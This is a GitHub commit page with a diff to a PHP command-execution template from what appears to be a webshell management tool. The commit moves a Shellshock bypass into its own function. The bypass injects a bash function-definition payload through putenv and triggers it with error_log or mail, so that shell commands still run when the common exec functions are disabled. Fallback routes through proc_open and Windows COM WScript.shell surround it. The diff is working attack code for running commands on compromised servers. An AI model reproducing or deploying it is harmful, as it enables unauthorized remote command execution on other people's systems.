Skip to content

Commit

Permalink
(Upgrade:Terminal) 调整shellshock执行逻辑,优化输出
Browse files Browse the repository at this point in the history
  • Loading branch information
@Medicean
Medicean committed Jul 15, 2019
1 parent 6c950f4 commit dcf752c
Showing 1 changed file with 24 additions and 19 deletions.
43 changes: 24 additions & 19 deletions source/core/php/template/command.js
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,28 @@ module.exports = (arg1, arg2) => ({
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
};
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
mail("[email protected]", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
};
function runcmd($c){
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
Expand Down Expand Up @@ -49,25 +71,8 @@ module.exports = (arg1, arg2) => ({
@proc_close($p);
}elseif(fe('antsystem')){
@antsystem($c);
}elseif(substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if(strstr(readlink("/bin/sh"),"bash")!=FALSE){
$tmp=tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
}else{
mail("[email protected]", "", "", "-bv");
}
}else{
print("Not vuln (not bash)\n");
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output!=""){
print($output);
}else{
print("No output, or not vuln.");
}
}elseif(runshellshock($d, $c)) {
return $ret;
}elseif(substr($d,0,1)!="/" && @class_exists("COM")){
$w=new COM('WScript.shell');
$e=$w->exec($c);
Expand Down

0 comments on commit dcf752c

Please sign in to comment.